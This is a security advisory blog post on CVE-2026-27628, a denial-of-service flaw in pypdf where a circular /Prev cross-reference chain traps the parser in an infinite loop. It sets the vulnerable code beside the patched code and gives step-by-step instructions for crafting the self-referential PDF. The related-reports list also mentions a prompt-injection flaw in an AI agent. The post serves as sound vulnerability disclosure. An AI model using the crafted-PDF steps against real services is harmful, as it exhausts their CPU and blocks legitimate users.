# Vulnerable implementation in pypdf/_reader.py def _read_xref_tables_and_trailers(self, stream, startxref): # ... initialization ... while startxref is not None: # The parser seeks to the offset blindly stream.seek(startxref, 0) # ... complex parsing logic ... # The parser reads the next link in the chain # If this points to an offset we just visited, we are doomed. startxref = trailer.get("/Prev")

# Patched implementation def _read_xref_tables_and_trailers(self, stream, startxref): # ... initialization ... visited_xref_offsets: set[int] = set() # [!code ++] while startxref is not None: # Check if we've been here before if startxref in visited_xref_offsets: # [!code ++] logger_warning( # [!code ++] f"Circular xref chain detected at offset {startxref}, stopping", # [!code ++] __name__, # [!code ++] ) # [!code ++] break # [!code ++] visited_xref_offsets.add(startxref) # [!code ++] stream.seek(startxref, 0) # ... parsing logic ...

Exploiting this is trivial if you understand raw PDF syntax. We don't need complex heap massaging or ROP chains; we just need a text editor. A PDF trailer usually looks like this:

trailer
<< /Size 10 /Root 1 0 R /Prev 400 >>
startxref
1000
%%EOF

In a valid file, the /Prev 400 implies there is another cross-reference table at byte offset 400. To exploit pypdf, we construct a file where the cross-reference table points to itself, or points to a second table that points back to the first.

Here is the logic flow of the attack:

Define a valid PDF structure (Header, Body, Xref).
Calculate the byte offset of the xref keyword (let's say it's at offset 550).
In the trailer dictionary, set /Prev 550.
Normally, startxref points to 550. The parser reads the table, finds /Prev 550, sets startxref to 550, and loops. And loops. And loops.

The PoC provided in the repository does exactly this using Python formatting to inject the calculated offsets dynamically. It creates a 'self-referential' PDF that is syntactically valid enough to trick the parser into the loop but logically broken.

Product

Affected Versions

Fixed Version

pypdf

py-pdf

< 6.7.2

6.7.2

Attribute

Detail

CWE

CWE-835 (Infinite Loop)

CVSS v3.1

7.5 (High)

Attack Vector

Network (via file upload)

Impact

Denial of Service (CPU Exhaustion)

Exploit Status

PoC Available

EPSS Score

0.04%

CVE-2026-27628

The Ouroboros Document: Infinite Loops in pypdf

Alon Barad

Software Engineer

Feb 25, 2026·5 min read·29 visits

Executive Summary (TL;DR)

pypdf < 6.7.2 fails to track visited offsets when parsing PDF cross-reference tables. A malicious PDF with a `/Prev` pointer referencing an earlier byte offset creates an infinite loop, causing permanent CPU exhaustion.

A critical Denial of Service (DoS) vulnerability exists in the `pypdf` library, a ubiquitous tool for PDF manipulation in the Python ecosystem. By crafting a PDF with a circular cross-reference (xref) chain, an attacker can trap the parser in an infinite loop. This results in immediate 100% CPU utilization and process hang, potentially taking down document processing pipelines, web services, or serverless functions.

Attack Flow Diagram

The Hook: Parsing the Unparsable

PDFs are not documents; they are containers of sorrow. The PDF specification is a sprawling, decades-old beast that supports features most people have never heard of, including incremental updates. When you edit a PDF, the software doesn't necessarily rewrite the whole file. Instead, it appends a new 'body' to the end, containing the changed objects and a new 'cross-reference' (xref) section.

To read the file, a parser starts at the end (the trailer) and works its way backward, following pointers to previous versions of the document. This is handled by the /Prev key in the trailer dictionary, which points to the byte offset of the previous xref table.

pypdf, one of the most popular Python libraries for handling PDFs, is tasked with traversing this chain to build a complete map of the document. It’s a standard linked-list traversal problem. But as any computer science freshman knows, if you traverse a linked list without checking for cycles, you are one bad pointer away from eternity. That is exactly what happened here.

The Flaw: Trusting the Trail

The vulnerability lies in the _read_xref_tables_and_trailers method within pypdf/_reader.py. This function is responsible for reconstructing the document structure by hopping from the most recent xref table to the oldest one via the /Prev attribute.

The logic was deceptively simple: start at the startxref offset, parse the table, look for a /Prev key, update startxref to that new value, and repeat until startxref is None. It looks standard, but it lacks a critical defensive programming concept: distrust.

The code blindly assumed that the chain of /Prev pointers would eventually terminate or at least move linearly backward through the file. It did not account for a malicious PDF where the trailer at offset 1000 points to a trailer at offset 500, which in turn points back to offset 1000. Once the parser enters this loop, it spins forever, repeatedly re-parsing and re-caching the same objects, consuming 100% of the CPU core until the process is killed or the universe ends.

The Code: The Smoking Gun

Let's look at the vulnerable code. It's a textbook example of an infinite loop waiting to happen. The variable startxref is the control condition, but there is no history of where we've been.

# Vulnerable implementation in pypdf/_reader.py
 
def _read_xref_tables_and_trailers(self, stream, startxref):
    # ... initialization ...
    while startxref is not None:
        # The parser seeks to the offset blindly
        stream.seek(startxref, 0)
        
        # ... complex parsing logic ...
        
        # The parser reads the next link in the chain
        # If this points to an offset we just visited, we are doomed.
        startxref = trailer.get("/Prev")

The fix, introduced in version 6.7.2, is elegant and standard: keep a set of visited offsets. If we see an offset again, we know we are in a loop, and we bail out.

# Patched implementation
 
def _read_xref_tables_and_trailers(self, stream, startxref):
    # ... initialization ...
    visited_xref_offsets: set[int] = set() # [!code ++]
    
    while startxref is not None:
        # Check if we've been here before
        if startxref in visited_xref_offsets: # [!code ++]
            logger_warning( # [!code ++]
                f"Circular xref chain detected at offset {startxref}, stopping", # [!code ++]
                __name__, # [!code ++]
            ) # [!code ++]
            break # [!code ++]
            
        visited_xref_offsets.add(startxref) # [!code ++]
        
        stream.seek(startxref, 0)
        # ... parsing logic ...

This simple addition of visited_xref_offsets completely neutralizes the attack. It transforms an infinite loop into a logged warning.

The Exploit: Crafting the Ouroboros

Exploiting this is trivial if you understand raw PDF syntax. We don't need complex heap massaging or ROP chains; we just need a text editor. A PDF trailer usually looks like this:

trailer
<< /Size 10 /Root 1 0 R /Prev 400 >>
startxref
1000
%%EOF

Here is the logic flow of the attack:

Define a valid PDF structure (Header, Body, Xref).
Calculate the byte offset of the xref keyword (let's say it's at offset 550).
In the trailer dictionary, set /Prev 550.
Normally, startxref points to 550. The parser reads the table, finds /Prev 550, sets startxref to 550, and loops. And loops. And loops.

The Impact: Death by Parsing

You might think, "It's just an infinite loop, who cares?" In the age of automated document processing, you should care deeply. Imagine a backend service that accepts user-uploaded resumes or invoices. This service likely spins up a worker process (or an AWS Lambda) to parse the PDF, extract text, or render a thumbnail.

If an attacker uploads a 5KB malformed PDF:

Resource Exhaustion: The worker process hits 100% CPU immediately.
Thread Starvation: If the application is synchronous (common in simple Flask/Django apps), that worker is dead. It can't handle other requests.
Bill Shock: If this is running in a serverless environment (Lambda/Cloud Run) with a high timeout (e.g., 15 minutes), you are paying for max compute for the full duration of the timeout, for every single malicious request.
DoS: Send 50 of these files concurrently, and you can lock up an entire fleet of workers with almost zero bandwidth cost.

Official Patches

GitHubCommit 0fbd959 fixing the infinite loop

Fix Analysis (1)

Technical Appendix

CVSS Score

7.5/ 10

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

EPSS Probability

0.04%

Top 88% most exploited

Affected Systems

pypdf < 6.7.2Python applications processing untrusted PDFs

Affected Versions Detail

Product	Affected Versions	Fixed Version
pypdf py-pdf	< 6.7.2	6.7.2

Attribute	Detail
CWE	CWE-835 (Infinite Loop)
CVSS v3.1	7.5 (High)
Attack Vector	Network (via file upload)
Impact	Denial of Service (CPU Exhaustion)
Exploit Status	PoC Available
EPSS Score	0.04%

MITRE ATT&CK Mapping

T1499.003Endpoint Denial of Service: OS Resource Exhaustion

Impact

CWE-835

Infinite Loop

Loop with Unreachable Exit Condition ('Infinite Loop')

Known Exploits & Detection

GitHubOriginal issue report containing the circular reference PoC

Vulnerability Timeline

Issue Reported on GitHub

2026-02-21

Fix Committed

2026-02-21

pypdf v6.7.2 Released

2026-02-22

CVE Published

2026-02-25

More Reports

•3 days ago•CVE-2026-9354

6.9

CVE-2026-9354: Arbitrary Mass Mention Bypass in NousResearch hermes-agent Slack and Mattermost Adapters

A vulnerability in the Slack and Mattermost platform adapters for NousResearch hermes-agent permits an unauthenticated remote attacker to execute arbitrary mass mentions. By leveraging prompt injection, an attacker can bypass output sanitization logic and trigger workspace-wide notification exhaustion.

Alon Barad

25 views•6 min read

•3 days ago•CVE-2026-9306

6.3

CVE-2026-9306: Unauthenticated Insecure Direct Object Reference (IDOR) in QuantumNous new-api Midjourney Relay

CVE-2026-9306 is a critical unauthenticated Insecure Direct Object Reference (IDOR) vulnerability located in the QuantumNous new-api application, affecting versions up to and including 0.12.1. The flaw is caused by improper middleware ordering combined with a lack of object-level authorization checks. This allows remote, unauthenticated attackers to retrieve sensitive Midjourney images belonging to other users by supplying a valid task identifier.

Amit Schendel

12 views•5 min read

•4 days ago•GHSA-GGXF-37HM-9WQF

6.5

GHSA-GGXF-37HM-9WQF: Session Leakage via Unsafe Challenge Path Parsing in instagrapi

The instagrapi library prior to version 2.6.9 contains an improper input validation vulnerability within its challenge handling mechanism. Maliciously crafted server responses can manipulate the client into forwarding session cookies and credentials to an external attacker-controlled domain.

Amit Schendel

20 views•6 min read

•4 days ago•GHSA-QQQM-5547-774X

9.1

GHSA-QQQM-5547-774X: Unauthenticated Path Traversal in FileBrowser Quantum PATCH Handler

GHSA-QQQM-5547-774X is a critical path traversal vulnerability in the FileBrowser Quantum application, specifically within the Go backend package. The vulnerability resides in the HTTP handler responsible for processing bulk file modifications via the public API. Unauthenticated attackers can exploit an order-of-operations flaw in the path sanitization logic to bypass intended directory restrictions. This allows adversaries to arbitrarily read, move, and overwrite files on the underlying filesystem by supplying specially crafted HTTP PATCH requests.

Alon Barad

5 views•6 min read

•4 days ago•CVE-2026-8723

5.3

CVE-2026-8723: Synchronous Denial of Service in qs npm Package via TypeError

The qs query string parsing and serialization library for Node.js is vulnerable to a synchronous Denial of Service (DoS) attack. The vulnerability manifests as a process-terminating TypeError when processing arrays with null or undefined elements under specific configuration parameters.

Amit Schendel

35 views•7 min read

•4 days ago•GHSA-7M8F-HGJQ-8GC9

7.5

GHSA-7M8F-HGJQ-8GC9: Pre-Authentication Denial of Service via Insecure Deserialization Order in aiosend

The aiosend library prior to version 3.0.6 contains a pre-authentication Denial of Service (DoS) vulnerability in its webhook handling mechanism. The software processes and deserializes incoming JSON payloads before verifying the cryptographic signature, allowing unauthenticated attackers to exhaust server CPU and memory resources by sending large, complex payloads.

Amit Schendel

3 views•6 min read